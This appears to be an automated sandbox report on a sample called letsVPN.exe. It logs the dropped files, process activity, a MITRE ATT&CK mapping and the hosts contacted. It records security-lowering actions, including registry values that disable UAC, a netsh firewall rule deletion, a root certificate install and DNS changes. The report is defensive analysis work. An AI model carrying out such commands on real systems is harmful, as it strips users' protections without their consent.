              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_0052F510 ??1LogMessage@logging@@QAE@XZ,CreateMutexW,CreateEventW,RegisterWaitForSingleObject,CreateNamedPipeW,SetEvent,19_2_0052F510
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000014006BC9C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_000000014006BC9C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0A8D59 _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,strlen,_malloc_crt,strlen,strcpy_s,_invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight,19_2_6D0A8D59
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00521880 ??1FilePath@base@@QAE@XZ,?Base64Encode@base@@YAXABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,??3@YAXPAX@Z,?ASCIIToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z,?WideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,memset,GetVersionExW,GetVersionExW,GetVersionExW,memset,VariantInit,VariantClear,VariantClear,VariantClear,?WideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,19_2_00521880
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Disable UAC(promptonsecuredesktop)
              Source: C:\Windows\System32\reg.exeRegistry value created: PromptOnSecureDesktop 0Jump to behavior
              Disables UAC (registry)
              Source: C:\Windows\System32\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
              Modifies the windows firewall
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xml
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob

              Stealing of Sensitive Information

              barindex
              Modifies the DNS server
              Source: C:\Windows\System32\svchost.exeRegistry value created:
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_005263C0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_005263C0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_0051E460 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_0051E460
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_005204D0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_005204D0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_0051E510 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_0051E510
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00516600 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00516600
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_005166C0 ??1LogMessage@logging@@QAE@XZ,??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_005166C0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_005276E0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_005276E0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00527790 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00527790
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00527830 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00527830
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_005278E0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_005278E0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00527990 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00527990
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00527A30 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0FilePath@base@@QAE@ABV01@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00527A30
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00526AC0 ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00526AC0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00527AE0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00527AE0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00527B90 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00527B90
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00529B90 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00529B90
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00527C40 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00527C40
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00529C30 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,19_2_00529C30
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0ED846 ??0exception@std@@QAE@XZ,??0exception@std@@QAE@XZ,_CxxThrowException,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,19_2_6D0ED846

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid Accounts331
              Windows Management Instrumentation              		1
              Scripting              		1
              LSASS Driver              		321
              Disable or Modify Tools              		11
              Input Capture              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API              		1
              LSASS Driver              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory2
              File and Directory Discovery              		Remote Desktop Protocol11
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts13
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Bypass User Account Control              		3
              Obfuscated Files or Information              		Security Account Manager178
              System Information Discovery              		SMB/Windows Admin Shares2
              Clipboard Data              		11
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell              		3
              Windows Service              		1
              Access Token Manipulation              		1
              Software Packing              		NTDS2
              Query Registry              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd11
              Registry Run Keys / Startup Folder              		3
              Windows Service              		1
              Timestomp              		LSA Secrets361
              Security Software Discovery              		SSHKeylogging3
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts13
              Process Injection              		1
              DLL Side-Loading              		Cached Domain Credentials2
              Process Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
              Registry Run Keys / Startup Folder              		1
              Bypass User Account Control              		DCSync261
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt42
              Masquerading              		/etc/passwd and /etc/shadow21
              System Network Configuration Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
              Modify Registry              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd261
              Virtualization/Sandbox Evasion              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
              Access Token Manipulation              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers13
              Process Injection              		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582024 Sample: letsVPN.exe Startdate: 29/12/2024 Architecture: WINDOWS Score: 60 128 yandex.com 2->128 130 www.yandex.com 2->130 132 8 other IPs or domains 2->132 144 Multi AV Scanner detection for submitted file 2->144 146 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 2->146 148 Machine Learning detection for sample 2->148 150 5 other signatures 2->150 11 mmc.exe 1 2->11         started        13 letsVPN.exe 3 17 2->13         started        17 mmc.exe 1 1 2->17         started        19 7 other processes 2->19 signatures3 process4 dnsIp5 22 letsvpn-latest.exe 11->22         started        120 C:\ProgramData\letsvpn-latest.exe, PE32 13->120 dropped 122 C:\ProgramData\...\sinaplayer_service.exe, PE32 13->122 dropped 124 C:\ProgramData\Jm42a\Q4nO1~16\s, PE32 13->124 dropped 126 3 other files (none is malicious) 13->126 dropped 170 Uses netsh to modify the Windows network and firewall settings 13->170 26 cmd.exe 1 13->26         started        28 cmd.exe 1 13->28         started        30 cmd.exe 2 13->30         started        32 netsh.exe 2 13->32         started        34 sinaplayer_service.exe 6 17->34         started        136 127.0.0.1 unknown unknown 19->136 172 Modifies the DNS server 19->172 37 drvinst.exe 19->37         started        39 drvinst.exe 19->39         started        file6 signatures7 process8 dnsIp9 98 C:\Program Files (x86)\...\tap0901.sys, PE32+ 22->98 dropped 100 C:\Program Files (x86)\...\netstandard.dll, PE32 22->100 dropped 102 C:\Program Files (x86)\...\LetsPRO.exe, PE32 22->102 dropped 110 219 other files (3 malicious) 22->110 dropped 152 Bypasses PowerShell execution policy 22->152 154 Modifies the windows firewall 22->154 156 Sample is not signed and drops a device driver 22->156 41 LetsPRO.exe 22->41         started        43 powershell.exe 22->43         started        54 9 other processes 22->54 158 Uses cmd line tools excessively to alter registry or file data 26->158 46 reg.exe 1 26->46         started        57 3 other processes 26->57 160 Uses ipconfig to lookup or modify the Windows network settings 28->160 59 2 other processes 28->59 104 C:\ProgramData\Jm42a\Q4nO1~16\base.dll, PE32 30->104 dropped 48 conhost.exe 30->48         started        50 conhost.exe 32->50         started        134 8.217.212.245, 15628, 49730, 49750 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 34->134 112 4 other files (none is malicious) 34->112 dropped 52 cmd.exe 34->52         started        114 2 other files (none is malicious) 37->114 dropped 106 C:\Windows\System32\...\tap0901.sys (copy), PE32+ 39->106 dropped 108 C:\Windows\System32\drivers\SETBDCE.tmp, PE32+ 39->108 dropped file10 signatures11 process12 file13 61 LetsPRO.exe 41->61         started        162 Loading BitLocker PowerShell Module 43->162 65 conhost.exe 43->65         started        164 Disables UAC (registry) 46->164 166 Performs a network lookup / discovery via ARP 52->166 67 conhost.exe 52->67         started        69 ipconfig.exe 52->69         started        116 C:\Users\user\AppData\...\tap0901.sys (copy), PE32+ 54->116 dropped 118 C:\Users\user\AppData\Local\...\SETB4F7.tmp, PE32+ 54->118 dropped 71 conhost.exe 54->71         started        73 conhost.exe 54->73         started        75 conhost.exe 54->75         started        77 11 other processes 54->77 168 Disable UAC(promptonsecuredesktop) 57->168 signatures14 process15 dnsIp16 138 yandex.com 77.88.55.88, 443, 49871 YANDEXRU Russian Federation 61->138 140 23.98.101.155, 443, 49876, 49913 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 61->140 142 11 other IPs or domains 61->142 174 Loading BitLocker PowerShell Module 61->174 79 cmd.exe 61->79         started        82 cmd.exe 61->82         started        84 cmd.exe 61->84         started        signatures17 process18 signatures19 176 Performs a network lookup / discovery via ARP 79->176 86 conhost.exe 79->86         started        88 ARP.EXE 79->88         started        90 conhost.exe 82->90         started        92 ipconfig.exe 82->92         started        94 conhost.exe 84->94         started        96 ROUTE.EXE 84->96         started        process20

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              letsVPN.exe32%VirustotalBrowse
              letsVPN.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\letsvpn\LetsPRO.exe0%ReversingLabs
              C:\Program Files (x86)\letsvpn\Update.exe0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dll3%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exe3%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe3%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Bcl.AsyncInterfaces.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Primitives.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.Clientuser.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Primitives.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://foo/bar/themes/tabcontrollerdictionary.bamld0%Avira URL Cloudsafe
              http://125.211.213.34/dump.php0%Avira URL Cloudsafe
              http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xamld0%Avira URL Cloudsafe
              http://foo/Themes/TabControllerDictionary.xaml0%Avira URL Cloudsafe
              http://www.hardcodet.net/taskbar0%Avira URL Cloudsafe
              http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xamld0%Avira URL Cloudsafe
              http://foo/bar/themes/windowdictionary.baml0%Avira URL Cloudsafe
